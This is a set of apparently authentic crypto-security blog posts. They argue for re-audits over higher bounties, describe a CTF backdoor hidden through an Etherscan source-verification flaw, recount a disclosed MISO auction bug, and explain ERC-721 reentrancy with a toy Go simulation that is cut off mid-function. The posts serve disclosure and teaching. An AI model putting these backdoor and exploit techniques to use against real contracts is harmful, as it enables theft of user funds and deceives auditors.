samczsun (https://samczsun.com/)

Higher Bug Bounties Won't Stop Hacks
https://samczsun.com/higher-bug-bounties-wont-stop-hacks/ (Wed, 10 Dec 2025)

Although projects can always choose to go above and beyond, it is well understood today that there are three key steps to crypto security: write tests to ensure that basic mistakes are caught during development, use audits and contests to conduct a comprehensive review prior to deployment, and set up a bug bounty program to incentivize and reward researchers who prevent exploits by responsibly disclosing vulnerabilities. The normalization of these best practices has significantly reduced the number of vulnerabilities that make it on-chain, forcing attackers to focus their efforts on off-chain vulnerabilities, such as private key theft or infrastructure compromise.

However, every so often, a thoroughly audited protocol offering a significant bug bounty is hacked, with the resulting fallout impacting not only the protocol itself, but trust in the ecosystem as a whole. The recent Yearn and Balancer V2 hacks, as well as the Abracadabra and 1inch hacks from earlier this year, show that not even battle-tested protocols are safe. Is there any way that the crypto industry could have avoided these hacks, or is this just a consequence of decentralized finance?

Commentators often suggest that a higher bug bounty would have protected these protocols, but even setting aside economic reality, bug bounties are a passive security measure that places the fate of the protocol in the hands of whitehats, while audits represent the protocol actively taking measures to ensure its own security. Higher bug bounties won’t stop hacks because they simply double down on the gamble that a whitehat will find the bug before a blackhat does. If protocols want to protect themselves, they need to proactively conduct re-audits instead.

Treasury vs TVL

Sometimes a hacker agrees to return a majority of stolen funds in exchange for keeping a small portion, typically 10%. Regrettably, the industry has termed this a “whitehat bounty”, which invites the question of why protocols don’t simply offer the same amount through their bug bounty program and avoid the hassle of negotiating. However, this intuition conflates dollars that can be stolen by an attacker with dollars that can be spent by a protocol.

Although a protocol appears to be able to tap into both pools of dollars for security purposes, protocols have the legal authority to spend dollars out of their own treasury but no legal authority to spend dollars that users have deposited. Users are also extremely unlikely to grant protocols permission ahead of time, and only when the situation is dire (i.e. depositors must choose between losing 10% of their deposit or losing 100% of their deposit) is there an implicit agreement that protocols now have permission to leverage deposits in negotiations. In other words, risk scales according to TVL but the security budget does not.

Capital Efficiency

Even if the protocol is well funded, whether because it has a large treasury, is profitable, or has instituted a security fee policy, the question of how to allocate those funds for the sake of security still remains. When compared to investing in a re-audit, raising bug bounties is extremely capital inefficient at best and introduces misaligned incentives between protocols and researchers at worst.

If bounties scale with TVL, there is a clear incentive to hold onto critical vulnerabilities if the researcher suspects that the protocol will grow in TVL and that the odds of a duplicate are low. This dynamic ultimately pits researchers directly against protocols to the detriment of their users. Simply increasing critical bounty payouts is unlikely to have the desired effect either; the pool of freelance researchers is large, but the number of people who dedicate a majority of their time to bug bounties and are also sufficiently skilled to find vulnerabilities within complex protocols is much smaller, and these elite researchers focus their attention on bounties which are most likely to generate a return on their time investment. For large battle-tested protocols, the probability of finding a bug feels so minuscule due to the presumed constant attention from hackers and other researchers that there simply is no dollar amount which would make it worth the effort. If such a dollar amount did exist, it would be so high as to be impractical.

Meanwhile, from a protocol’s perspective, a bug bounty represents an amount of money which has been reserved for the purpose of paying for a single critical vulnerability. Unless a protocol is willing to bet that absolutely no critical vulnerabilities will be found while also misleading researchers about its liquidity, this money cannot be spent elsewhere. Rather than passively waiting for a researcher to uncover a critical vulnerability, the same dollar amount could be used to fund multiple re-audits over a period of years. Each re-audit guarantees attention from top-tier researchers, is not artificially limited to a single finding, and aligns incentives between researchers and protocols: both parties suffer reputational harm if the protocol is exploited.

Existing Precedent

In the software and financial industries, audits which expire annually are a tried and true practice, offering the best way to communicate whether or not a company is keeping up with the evolving threat landscape. SOC 2 Type II reports are used by B2B customers to determine if a vendor is maintaining proper security controls, PCI DSS certifications show that a company is taking proper care to maintain sensitive payments information, and FedRAMP certifications are required by the US government to maintain a high bar for anyone who has access to government information.

Although the smart contracts themselves are immutable, the environment is not. Configuration settings may change over time, dependencies may be upgraded, and code patterns previously thought to be safe may actually be harmful. When a protocol gets audited, it is an assessment of the security posture at the time of the audit, not a forward-looking guarantee that a protocol will remain secure. The only way to refresh the assessment is to perform a re-audit.

In 2026, the crypto industry should adopt annual re-audits as the fourth step in securing a protocol. Existing protocols with significant TVL should conduct a re-audit of their deployment, audit firms should offer specialized re-audit services that focus on evaluating the entire deployment, and the ecosystem should collectively start treating audit reports as what they are: a point-in-time assessment of security which can expire, not a permanent guarantee of security.

Thanks to Dickson Wu, Josselin Feist, cts (@gf_256), Andrew MacPherson, pcaversaccio, Jack Sanford, and David Desjardins for their feedback.

Hiding in Plain Sight
https://samczsun.com/hiding-in-plain-sight/ (Thu, 11 Nov 2021)

I like challenging assumptions.

I like trying to do the impossible, finding what others have missed, and blowing people's minds with things they never saw coming. Last year, I wrote a challenge for Paradigm CTF 2021 based on a very obscure Solidity bug. While one variation had been publicly disclosed, the vulnerability I exploited had never really been discussed. As a result, almost everyone who tried the challenge was stumped by the seemingly impossible nature of it.

A few weeks ago, we were discussing plans around Paradigm CTF 2022 when Georgios posted a teaser tweet. I thought it would be incredibly cool to drop a teaser challenge on the same day as the kickoff call. However, it couldn't just be any old teaser challenge. I wanted something out of this world, something that no one would see coming, something that pushed the limits of what people could even imagine. I wanted to write the first Ethereum CTF challenge that exploited an 0day.

How It's Made: 0days

As security researchers, there are a few base assumptions we make in order to optimize our time. One is that the source code we're reading really did produce the contract we're analyzing. Of course, this assumption only holds if we're reading the source code from somewhere trusted, like Etherscan. Therefore, if I could figure out a way to have Etherscan verify something incorrectly, I would be able to design a really devious puzzle around it.

In order to figure out how to exploit Etherscan's contract verification system, I had to verify some contracts. I deployed a few contracts to Ropsten to play around with and tried verifying them. Immediately, I was greeted with a screen asking me to choose the compiler settings.

I selected the correct settings and moved on to the next screen. Here, I was asked to provide my contract source code.

I put in the source code and clicked verify. Sure enough, my source code was now attached to my contract.


Now that I knew how things worked, I could start playing around with the verification process. The first thing I tried was deploying a new contract with foo changed to bar and verifying that contract with the original source code. Unsurprisingly, Etherscan refused to verify my contract.


However, when I manually compared the two bytecode outputs, I noticed something strange. Contract bytecode is supposed to be hex, but there was clearly some non-hex in there.


I knew that Solidity appended contract metadata to the deployed bytecode, but I never really considered how it affects contract verification. Clearly, Etherscan was scanning through the bytecode for the metadata and then replacing it with a marker that said, "Anything in this region is allowed to be different, and we'll still consider it the same bytecode."
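As a rough sketch of what that scanning has to work with: Solidity's appended metadata is CBOR-encoded, and its final two bytes encode the length of the metadata blob, so a verifier can peel it off the end of the runtime bytecode. Here is a minimal Python sketch, using a toy bytecode rather than real compiler output:

```python
def split_metadata(runtime_bytecode: bytes):
    """Split runtime bytecode into (code, metadata), assuming the standard
    Solidity layout: the final two bytes are a big-endian length of the
    CBOR-encoded metadata that precedes them."""
    meta_len = int.from_bytes(runtime_bytecode[-2:], "big")
    total = meta_len + 2  # metadata blob plus the 2-byte length suffix
    return runtime_bytecode[:-total], runtime_bytecode[-total:]

# Toy input: 4 bytes of "code", a fake 3-byte metadata blob, then 0x0003.
bytecode = bytes.fromhex("60016002") + b"\xaa\xbb\xcc" + (3).to_bytes(2, "big")
code, metadata = split_metadata(bytecode)
```

Anything inside that metadata slice is exactly the region a verifier might mark as allowed-to-differ.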

This seemed like a promising lead for a potential 0day. If I could trick Etherscan into interpreting non-metadata as metadata, then I would be able to tweak my deployed bytecode in the region marked {ipfs} while still having it verify as the legitimate bytecode.

The easiest way I could think of to include some arbitrary bytecode in the creation transaction was to encode them as constructor arguments. Solidity encodes constructor arguments by appending their ABI-encoded forms directly onto the create transaction data.
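A minimal Python sketch of that layout (the creation code here is truncated and purely illustrative):

```python
# The deployment transaction data is simply creation_code + ABI-encoded args.
creation_code = bytes.fromhex("6080604052")   # truncated, illustrative only
arg = 0xAAAAAAAA                              # a uint256 constructor argument
encoded_arg = arg.to_bytes(32, "big")         # ABI encoding of a uint256
tx_data = creation_code + encoded_arg
```

Because the arguments sit right at the tail of the transaction data, they looked like the easiest place to smuggle in arbitrary bytes.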


However, Etherscan was too smart, and excluded the constructor arguments from any sort of metadata sniffing. In the bytecode view, the constructor arguments are shown in italics to indicate that they're separate from the code itself.

This meant I would need to somehow trick the Solidity compiler into emitting a sequence of bytes that I controlled, so I could make it resemble the embedded metadata. However, this seemed like a nightmare of a problem to solve, since I would have almost no control over the opcodes or bytes that Solidity chooses to use without some serious compiler wrangling, after which the source code would look extremely suspicious.

I considered this problem for a while, until it hit me: it was actually extremely easy to cause Solidity to emit (almost) arbitrary bytes. The following code will cause Solidity to emit 32 bytes of 0xAA.

bytes32 value = 0xaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa;

Motivated, I quickly wrote a small contract which would push a series of constants in such a way that Solidity would emit bytecode which exactly resembled the embedded metadata.


To my delight, Etherscan marked the presence of an IPFS hash in the middle of my contract, where no embedded metadata should ever be found.


I quickly copied the expected bytecode and replaced the IPFS hash with some random bytes, then deployed the resulting contract. Sure enough, Etherscan considered the differing bytes business as usual, and allowed my contract to be verified.


With this contract, the source code suggests that a simple bytes object should be returned when calling example(). However, if you actually try to call it, this happens.

$ seth call 0x3cd2138cabfb03c8ed9687561a0ef5c9a153923f 'example()'
seth-rpc: {"id":1,"jsonrpc":"2.0","method":"eth_call","params":[{"data":"0x54353f2f","to":"0x3CD2138CAbfB03c8eD9687561a0ef5C9a153923f"},"latest"]}
seth-rpc: error:   code       -32000
seth-rpc: error:   message    stack underflow (5 <=> 16)

I had successfully discovered an 0day within Etherscan, and now I could verify contracts which behaved completely differently from what the source code suggested. Now I just needed to design a puzzle around it.

A false start

Clearly, the puzzle would revolve around the idea that the source code as seen on Etherscan was not how the contract would actually behave. I also wanted to make sure that players couldn't simply replay transactions directly, so the solution had to be unique per-address. The best way to do this was obviously to require a signature.

But in what context would players be required to sign some data? My first design was a simple puzzle with a single public function. Players would call the function with a few inputs, sign the data to prove they came up with the solution, and if the inputs passed all the various checks then they would be marked as a solver. However, as I fleshed out this design over the next few hours, I quickly grew dissatisfied with how things were turning out. It was starting to become very clunky and inelegant, and I couldn't bear the idea of burning such an awesome 0day on such a poorly designed puzzle.

Resigning myself to the fact that I wouldn't be able to finish this in time for Friday, I decided to sleep on it.

Pinball

I continued trying to iterate on my initial design over the weekend, but made no more progress. It was like I'd hit a wall with my current approach, and even though I didn't want to admit it, I knew that I'd likely have to start over if I wanted something I'd be satisfied with.

Eventually, I found myself reexamining the problem from first principles. What I wanted was a puzzle where players had to complete a knowledge check of sorts. However, there was no requirement that completing the knowledge check itself was the win condition. Rather, it could be one of many paths that the player is allowed to take. Perhaps players could rack up points throughout the puzzle, with the exploit providing some sort of bonus. The win condition would simply be the highest score, therefore indirectly encouraging use of the exploit.

I thought back to a challenge I designed last year, Lockbox, which forced players to construct a single blob of data which would meet requirements imposed by six different contracts. The contracts would apply different constraints on the same bytes, forcing players to be clever in how they constructed their payload. I realized I wanted to do something similar here, where I would require players to submit a single blob of data and I would award points based on certain sections of data meeting specific requirements.

It was at this point that I realized I was basically describing pinboooll, a challenge I worked on during the finals of DEFCON CTF 2020. The gimmick with pinboooll was that when you executed the binary, execution would bounce around the control flow graph similar to how a ball bounces around in a pinball machine. By constructing the input correctly, you would be able to hit specific sections of code and rack up points. Of course, there was an exploit involved as well, but frankly speaking I'd already forgotten what it was and I had no intention of trying to find it again. Besides, I already had my own exploit I wanted to use.

Since I was handling a live 0day here, I decided that I wanted to get the puzzle out as soon as possible, even if it meant compromising on how much of someone else's work I'd be copying. In the end, I spent a few hours refreshing myself on how pinboooll worked and a few days re-implementing it in Solidity. This took care of the scaffolding of the puzzle; now I just had to integrate the exploit.

Weaponizing an 0day

My approach to getting Solidity to output the right bytes had always been to just load several constants and have Solidity emit the corresponding PUSH instructions. However, such arbitrary constants would likely be a huge red flag and I wanted something that would blend in slightly better. I also had to load all the constants in a row, which would be hard to explain in actual code.

Because I really only needed to hardcode two sequences of magic bytes (0xa264...1220 and 0x6473...0033) I decided to see if I could sandwich code between them, instead of a third constant. In the deployed contract, I would just swap out the sandwiched code with some other instructions.

address a = 0xa264...1220;

uint x = 1 + 1 + 1 + ... + 1;

address b = 0x6473...0033;

After some experimentation, I found it would be possible, but only if the optimizer was enabled. Otherwise, Solidity emits too much value cleanup code. This was acceptable, so I moved on to refining the code itself.

I would only be able to modify the code within the two addresses, but it would be weird to see a dangling address at the end, so I decided to use them in conditionals instead. I also had to justify the need for the second conditional, so I threw in a little score bonus in the end. I made the first conditional check that the tx.origin matched a hardcoded value to give people the initial impression that there was no point pursuing this code path any further.

if (tx.origin != 0x13378bd7CacfCAb2909Fa2646970667358221220) return true;

state.rand = 0x40;
state.location = 0x60;

if (msg.sender != 0x64736F6c6343A0FB380033c82951b4126BD95042) return true;

state.baseScore += 1500;

Now that the source code was all prepared, I had to write the actual backdoor. My backdoor would need to verify that the player triggered the exploit correctly, fail silently if they didn't, and award them a bonus if they did. I wanted to make sure the exploit couldn't be easily replayed, so I decided on simply requiring the player to sign their own address and to submit the signature in the transaction. For extra fun, I decided to require the signature to be located at offset 0x44 in the transaction data, where the ball would typically begin. This would require players to understand how ABI encoding works and to manually relocate the ball data elsewhere.
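Assuming the entrypoint takes a single dynamic bytes argument (my inference, not something stated in the contract), offset 0x44 falls straight out of standard ABI encoding: a 4-byte selector, then a 32-byte offset word, then a 32-byte length word, and only then the data itself.

```python
SELECTOR = 4   # 4-byte function selector
WORD = 0x20    # ABI encoding works in 32-byte words
# selector, then the offset word, then the length word, then the data:
data_start = SELECTOR + WORD + WORD
```

Relocating the ball data means rewriting that offset word by hand, which is exactly the ABI-encoding knowledge check I wanted.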

However, here I ran into a big problem: it's simply not possible to fit all of this logic into 31 bytes of hand-written assembly. Fortunately, after some consideration, I realized that I had another 31 bytes to play with. After all, the real embedded metadata contained another IPFS hash that Etherscan would also ignore.

After some code golfing, I arrived at a working backdoor. In the first IPFS hash, I would immediately pop off the address that just got pushed, then jump to the second IPFS hash. There, I would hash the caller and partially set up the memory/stack for a call to ecrecover. Then I would jump back to the first IPFS hash, where I would finish setting up the stack and perform the call. Finally, I would set the score multiplier to be equal to (msg.sender == ecrecover()) * 0x40 + 1, which meant that no additional branching was needed.
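The trick works because an EVM comparison produces exactly 0 or 1, so the multiplier needs no jump at all. In Python terms (a hypothetical model, not the actual assembly):

```python
def multiplier(signature_valid: bool) -> int:
    # mirrors (msg.sender == ecrecover()) * 0x40 + 1: the comparison
    # result is 0 or 1, so no branch is needed
    return int(signature_valid) * 0x40 + 1

multiplier(True)   # 0x41: exploit bonus applied
multiplier(False)  # 1: score passes through unchanged
```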

After code golfing the backdoor down to size, I tweeted out my Rinkeby address in order to get some testnet ETH from the faucet, and to drop a subtle hint to anyone watching Twitter that something might be coming. Then, I deployed the contract and verified it.


Now all that was left to do was wait for someone to discover the backdoor that was hiding in plain sight.

Two Rights Might Make A Wrong
https://samczsun.com/two-rights-might-make-a-wrong/ (Tue, 17 Aug 2021)

A common misconception in building software is that if every component in a system is individually verified to be safe, the system itself is also safe. Nowhere is this belief better illustrated than in DeFi, where composability is second nature to developers. Unfortunately, while composing two components might be safe most of the time, it only takes one vulnerability to cause serious financial damage to hundreds if not thousands of innocent users. Today, I’d like to tell you about how I found and helped patch a vulnerability that put over 109k ETH (~350 million USD at today’s exchange rate) at risk.

The Encounter

9:42 AM

I was offhandedly browsing through the LobsterDAO group on Telegram when I noticed a discussion between @ivangbi_ and @bantg about a new raise on SushiSwap’s MISO platform. I typically try to avoid drama in public, but I couldn’t help but do a quick Google search to see what it was all about. The results I got back weren’t particularly interesting to me, but I pressed onward, driven by a feeling there was something interesting to be found here if I just kept looking.

The MISO platform operates two types of auctions: Dutch auctions and batch auctions. In this case, the raise was being held with a Dutch auction. Naturally, the first thing I did was open up the contract on Etherscan.

9:44 AM

I quickly skimmed through the DutchAuction contract per the participation agreement and checked each interesting function. The commit functions (commitEth, commitTokens, and commitTokensFrom) all seemed to be implemented correctly. The auction management functions (setDocument, setList, etc) also had the proper access controls. However, near the bottom I noticed that the initMarket function had no access controls, which was extremely concerning. Furthermore, the initAuction function it called also contained no access control checks.

I didn’t really expect this to be a vulnerability though, since I didn’t expect the Sushi team to make such an obvious misstep. Sure enough, the initAccessControls function validated that the contract had not already been initialized.

However, this led me to another discovery. While scrolling through all of the files, I noticed the SafeTransfer and BoringBatchable libraries. I was familiar with both of these, and I was immediately struck with the potential that the BoringBatchable library introduced.

For those who aren’t familiar, BoringBatchable is a mixin library which is designed to easily introduce batch calls to any contract which imports it. It does this by performing a delegatecall on the current contract for each call data provided in the input.

    function batch(bytes[] calldata calls, bool revertOnFail) external payable returns (bool[] memory successes, bytes[] memory results) {
        successes = new bool[](calls.length);
        results = new bytes[](calls.length);
        for (uint256 i = 0; i < calls.length; i++) {
            (bool success, bytes memory result) = address(this).delegatecall(calls[i]);
            require(success || !revertOnFail, _getRevertMsg(result));
            successes[i] = success;
            results[i] = result;
        }
    }

Looking at this function, it appeared to be implemented correctly. However, something in the corner of my mind was nagging at me. That’s when I realized I had seen something very similar in the past.

The Discovery

9:47 AM

A little over a year ago today, I was in a Zoom call with the Opyn team, trying to figure out how to recover and protect user funds after a devastating hack. The hack itself was simple but genius: it exercised multiple options using a single payment of ETH because the Opyn contracts used the msg.value variable in a loop. While processing token payments involved a separate transferFrom call for each loop iteration, processing ETH payments simply checked whether msg.value was sufficient. This allowed the attacker to reuse the same ETH multiple times.

I realized that I was looking at the exact same vulnerability in a different form. Inside a delegatecall, msg.sender and msg.value are persisted. This meant that I should be able to batch multiple calls to commitEth and reuse my msg.value across every commitment, allowing me to bid in the auction for free.
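A toy Python model of that failure mode (names and numbers are illustrative, not the MISO code):

```python
# msg.value persists across delegatecalls, so each batched commitEth()
# credits the same ETH again while only one real deposit was made.
class Auction:
    def __init__(self):
        self.commitments = 0  # ETH credited to bidders
        self.balance = 0      # ETH the contract actually holds

    def commit_eth(self, msg_value):
        # only msg.value is checked; no fresh transfer per call
        self.commitments += msg_value

    def batch(self, msg_value, n_calls):
        self.balance += msg_value   # one real deposit...
        for _ in range(n_calls):    # ...credited n_calls times
            self.commit_eth(msg_value)

auction = Auction()
auction.batch(msg_value=1, n_calls=100)
# 100 ETH of commitments credited against a single 1 ETH deposit
```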

9:52 AM

My instincts were telling me that this was the real deal, but I couldn’t be sure without verifying it. I quickly opened up Remix and wrote a proof-of-concept. To my dismay, my mainnet fork environment was completely busted. I must’ve accidentally broken it during the London hard fork. With how much money was at risk though, I didn’t have the luxury of time. I quickly threw together a poor man’s mainnet fork on the command line and tested my exploit. It worked.

10:13 AM

I pinged my colleague, Georgios Konstantopoulos, to get a second pair of eyes on this before reporting it. While I waited for a response, I went back to the contract to look for ways to elevate the severity. It was one thing to be able to participate in the auction for free, but it would be another to be able to steal all of the other bids too.

I had noticed there was some refund logic during my initial scan but thought little of it. Now, it was a way to get ETH out of the contract. I quickly checked what conditions I would need to meet in order to get the contract to provide me with a refund.

To my surprise (and horror), I found that a refund would be issued for any ETH sent which went over the auction’s hard cap. This applied even once the hard cap was hit, meaning that instead of rejecting the transaction altogether, the contract would simply refund all of your ETH instead.
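An illustrative model of that refund behavior (the names are hypothetical, not the MISO source): any ETH over the hard cap is returned, even once the cap is already hit, so a reused msg.value turns every extra batched call into a payout of ETH the attacker never actually sent.

```python
HARD_CAP = 50

def commit_eth(committed_total, contract_balance, msg_value):
    # accept only what fits under the cap; refund the rest,
    # even when nothing at all is accepted
    accepted = max(0, min(msg_value, HARD_CAP - committed_total))
    refund = msg_value - accepted
    return committed_total + accepted, contract_balance - refund

# Cap already reached; the contract holds 100 ETH of bids plus the
# attacker's single 10 ETH deposit. Three batched calls share that
# one msg.value:
total, balance = HARD_CAP, 110
for _ in range(3):
    total, balance = commit_eth(total, balance, 10)
# the attacker sent 10 ETH but was "refunded" 30
```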

Suddenly, my little vulnerability just got a lot bigger. I wasn’t dealing with a bug that would let you outbid other participants. I was looking at a 350 million dollar bug.

The Disclosure

10:38 AM

After verifying the bug with Georgios, I asked him and Dan Robinson to try and reach out to Joseph Delong from Sushi. Within minutes, Joseph had responded and I found myself in a Zoom call with Georgios, Joseph, Mudit, Keno, and Omakase. I quickly debriefed the participants on the vulnerability and they left to coordinate a response. The entire call lasted mere minutes.

11:10 AM

Joseph got back to Georgios and me with a Google Meet room. I joined as Georgios was in the middle of debriefing Joseph, Mudit, Keno, and Omakase, as well as Duncan and Mitchell from Immunefi. We quickly discussed next steps.

We had three options:

  1. Leave the contract and hope no one notices
  2. Rescue the funds using the exploit, probably using Flashbots to hide the transaction
  3. Rescue the funds by purchasing the remaining allocation and immediately finalizing the auction, requiring admin permissions

After some quick debate, we decided that option 3 was the cleanest approach. We broke out into separate rooms in order to work on comms and ops separately.

The Preparation

11:26 AM

Inside the ops room, Mudit, Keno, Georgios, and I were busy writing a simple rescue contract. We decided that it would be cleanest to take a flash loan, purchase up to the hard cap, finalize the auction, then repay the flash loan using proceeds from the auction itself. This would require no upfront capital, which was very nice.

12:54 PM

We ran into a problem. What was originally supposed to be a simple rescue operation had just turned into a ticking time bomb that couldn’t be defused, because there was another active auction. This was a batch auction, which meant that we couldn’t just buy up to the hard cap because there was no hard cap at all. Fortunately, the lack of a hard cap also meant there was no way to drain ETH from the contract because no refunds were offered.

We quickly discussed the pros and cons of performing a whitehat rescue on the first contract and ultimately decided that even though the batch auction had 8 million USD committed, those 8 million USD weren’t at risk, while the 350 million USD in the original Dutch auction was very much still at risk. Even if someone was tipped off by our forced halting of the Dutch auction and found the bug in the batch auction, we would still save the majority of the money. The call to proceed was made.

1:36 PM

As we wrapped up work on the rescue contract, we discussed next steps for the batch auction. Mudit pointed out that there was a points list which could be set even while the auction was live, and it was called during each ETH commitment. We immediately realized this could be the pause function we were looking for.

We brainstormed different ways to make use of this hook. Immediately reverting was an obvious solution, but we wanted something better. I considered adding a check that every origin could only make one commitment per block, but we noticed that the function was marked as view, which meant that the Solidity compiler would have used a static call opcode. Our hook wouldn’t be allowed to make any state modifications.

After some more thinking, I realized that we could use the points list to verify that the auction contract had enough ETH to match the commitments being made. In other words, if someone tried to exploit this bug, then there would be more commitments than there was ETH. We could easily detect this and revert the transaction. Mudit and Keno began working on writing a test to verify.
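In other words, the hook can enforce a conservation invariant using nothing but reads. A hypothetical model (illustrative names, not the deployed hook):

```python
def points_hook(contract_balance, commitments_total):
    # any msg.value reuse makes credited commitments exceed real ETH,
    # so a read-only balance check is enough to catch the exploit
    if contract_balance < commitments_total:
        raise RuntimeError("revert: commitments exceed balance")
    return True
```

The check fits inside a view context because it only compares two values and reverts, which is exactly what the staticcall restriction allows.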

The Rescue

2:01 PM

The comms breakout team merged with the ops breakout team to sync on progress. They had made contact with the team performing the raise, but the team wanted to finalize the auction manually. We discussed the risks and agreed that there was minimal likelihood that an automated bot would notice the transaction or be able to do anything about it.

2:44 PM

The team performing the raise finalized the auction, neutralizing the immediate threat. We congratulated each other and went our separate ways. The batch auction would finalize later in the day to little fanfare. No one outside of the circle of trust knew what scale of crisis had just been averted.

The Reflection

4:03 PM

The past few hours feel like a blur, almost as though no time has passed at all. I had gone from encounter to discovery in a little over half an hour, disclosure in 20 minutes, war room in another 30, and a fix in three hours. All in all, it took only five hours to protect 350 million USD from falling into the wrong hands.

Even though there was no monetary damage, I’m sure that everyone involved would have much preferred to not have gone through this process in the first place. To that end, I have two main takeaways for you.

First, using msg.value in complex systems is hard. It’s a global variable that you can’t change and persists across delegate calls. If you use msg.value to check that payment was received, you absolutely cannot place that logic in a loop. As a codebase grows in complexity, it’s easy to lose track of where that happens and accidentally loop something in the wrong place. Although wrapping and unwrapping of ETH is annoying and introduces extra steps, the unified interface between WETH and other ERC20 tokens might be well worth the cost if it means avoiding something like this.
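One safer shape, sketched in Python rather than Solidity since it's the accounting that matters (the function name and signature are illustrative): consume the payment once into an explicit budget and decrement it per iteration, so the same value can never be counted twice.

```python
def batch_commit(msg_value, amounts):
    remaining = msg_value
    for amount in amounts:
        if amount > remaining:
            raise RuntimeError("insufficient ETH sent")
        remaining -= amount        # spend the budget down each iteration
    return remaining
```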

Second, safe components can come together to make something unsafe. I’ve preached this before in the context of composability and DeFi protocols, but this incident shows that even safe contract-level components can be mixed in a way that produces unsafe contract-level behavior. There’s no catch-all advice to apply here like “checks-effects-interactions,” so you just need to be cognizant of what additional interactions new components are introducing.

I’d like to thank Sushi contributors, Joseph, Mudit, Keno, and Omakase for their extremely quick response to this issue as well as my colleagues Georgios, Dan, and Jim for their help throughout this process, including reviewing this post.

The Dangers of Surprising Code
https://samczsun.com/the-dangers-of-surprising-code/ (Fri, 13 Aug 2021)

If you work in software engineering, odds are you've heard of at least one software engineering principle. While I wouldn't advocate for religiously following every principle to the letter, there are a few that are really worth paying attention to.

The one I want to talk about today is the principle of least astonishment. It has a fancy name but is a really simple idea. All it says is that when presented with code that claims to do something, most users will make assumptions regarding how it behaves to get that thing done. As such, your job as the developer is to write your code to match those assumptions so that your users don't get a nasty surprise.

This is a good principle to follow because developers like making assumptions about things. If you export a function called calculateScore(GameState), a lot of people are going to rightly assume that the function will only read from the game state. If you also mutate the game state, you'll surprise a lot of very confused people trying to figure out why their game state is randomly getting corrupted. Even if you put it in the documentation, there's still no guarantee that people will see it, so it's best to just ensure your code isn't surprising in the first place.

Safer Is Better, Right?

When the ERC-721 standard was being drafted, back in the beginning of 2018, a suggestion was made to implement transfer security to ensure that tokens wouldn't be stuck in recipient contracts that weren't designed to handle them. To do this, the proposal authors modified the behavior of the transfer function to check the recipient for whether they were capable of supporting the token transfer. They also introduced the unsafeTransfer function which would bypass this check, should the sender so desire.

However, due to concerns about backwards compatibility, the functions were renamed in a subsequent commit, making the transfer function behave the same for both an ERC-20 and an ERC-721 token. The recipient check now needed to live elsewhere, so the safe class of functions was introduced: safeTransfer and safeTransferFrom.

This was a solution for a legitimate problem, as there have been numerous examples of ERC-20 tokens being accidentally transferred to contracts that never expected to receive tokens (one particularly common mistake was to transfer tokens to the token contract itself, locking them forever). It's no surprise then that when the ERC-1155 standard was being drafted, it took inspiration from the ERC-721 standard by including recipient checks not only on transfer but on mint as well.

These standards mostly sat dormant for the next few years while ERC-20 maintained its popularity, but rising gas costs as well as interest in NFTs mean that the ERC-721 and ERC-1155 standards have recently seen a spike in developer usage. With all this renewed interest, it sure is fortunate that these standards were designed with safety in mind, right?

Safer Is Better, Right?

Ok, but what exactly does it mean for a transfer or mint to be safe? Different parties have different interpretations of safety. For a developer, a safe function might mean that it doesn't contain any bugs or introduce additional security concerns. For a user, it could mean that it contains additional guardrails to protect them from accidentally shooting themselves in the foot.

It turns out that in this case, these functions are more of the latter and less of the former. This is especially unfortunate because given the choice between transfer and safeTransfer, why wouldn't you pick the safe one? It's in the name!

Well, one reason might be our old friend reentrancy, or as I've been trying my hardest to rebrand it to: unsafe external calls. Recall that any external call is potentially unsafe if the recipient is attacker-controlled because the attacker may be able to cause your contract to transition into an undefined state. By design, these "safe" functions perform an external call to the recipient of the tokens, which is often controlled by the sender during a mint or transfer. In other words, this is practically a textbook example of an unsafe external call.

But, you might ask yourself, what's the worst that could happen from allowing a recipient contract to reject a transfer that they weren't able to process? Well, allow me to answer that question with two quick case studies.

Hashmasks

Hashmasks are NFTs with a limited supply. Users were able to purchase up to 20 masks per transaction, although they've been sold out for months already. Here's the function to buy masks:

function mintNFT(uint256 numberOfNfts) public payable {
    require(totalSupply() < MAX_NFT_SUPPLY, "Sale has already ended");
    require(numberOfNfts > 0, "numberOfNfts cannot be 0");
    require(numberOfNfts <= 20, "You may not buy more than 20 NFTs at once");
    require(totalSupply().add(numberOfNfts) <= MAX_NFT_SUPPLY, "Exceeds MAX_NFT_SUPPLY");
    require(getNFTPrice().mul(numberOfNfts) == msg.value, "Ether value sent is not correct");

    for (uint i = 0; i < numberOfNfts; i++) {
        uint mintIndex = totalSupply();
        if (block.timestamp < REVEAL_TIMESTAMP) {
            _mintedBeforeReveal[mintIndex] = true;
        }
        _safeMint(msg.sender, mintIndex);
    }

    /**
    * Source of randomness. Theoretical miner withhold manipulation possible but should be sufficient in a pragmatic sense
    */
    if (startingIndexBlock == 0 && (totalSupply() == MAX_NFT_SUPPLY || block.timestamp >= REVEAL_TIMESTAMP)) {
        startingIndexBlock = block.number;
    }
}

If you weren't expecting it, then this function might seem perfectly reasonable. However, as you might have predicted, there's something sinister hidden inside that _safeMint call. Let's take a look.

    function _safeMint(address to, uint256 tokenId, bytes memory _data) internal virtual {
        _mint(to, tokenId);
        require(_checkOnERC721Received(address(0), to, tokenId, _data), "ERC721: transfer to non ERC721Receiver implementer");
    }

For safety, this function performs a callback to the recipient of the token to check that they're willing to accept the transfer. However, we're the recipient of the token, which means we just got a callback, at which point we can do whatever we like, including calling mintNFT again. If we do this, we'll reenter the function after only one mask has been minted, which means we can request to mint another 19 masks. This results in a total of 39 masks being minted (1 before the reentrant call, 19 inside it, and the remaining 19 as the original loop resumes), even though the per-transaction maximum was only 20.
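The reentrancy above can be simulated outside the EVM. This is a toy Go model (not the real Hashmasks contract; `masks`, `mintNFT`, and `onMint` are invented stand-ins for the contract, its mint function, and the onERC721Received callback): the per-call cap of 20 holds for each call individually, but the callback lets an attacker start a second call in the middle of the first.

```go
package main

import "fmt"

// masks models the NFT contract: supply is the number minted so far, and
// onMint stands in for the onERC721Received callback fired by _safeMint.
type masks struct {
	supply int
	onMint func()
}

// mintNFT enforces the per-call cap, then mints one token at a time,
// handing control to the (attacker-controlled) recipient after each mint.
func (m *masks) mintNFT(n int) {
	if n <= 0 || n > 20 {
		panic("You may not buy more than 20 NFTs at once")
	}
	for i := 0; i < n; i++ {
		m.supply++ // _mint
		if m.onMint != nil {
			m.onMint() // _checkOnERC721Received: unsafe external call
		}
	}
}

func main() {
	m := &masks{}
	reentered := false
	m.onMint = func() {
		if !reentered {
			reentered = true
			m.mintNFT(19) // reenter after the 1st mint of the outer call
		}
	}
	m.mintNFT(20)
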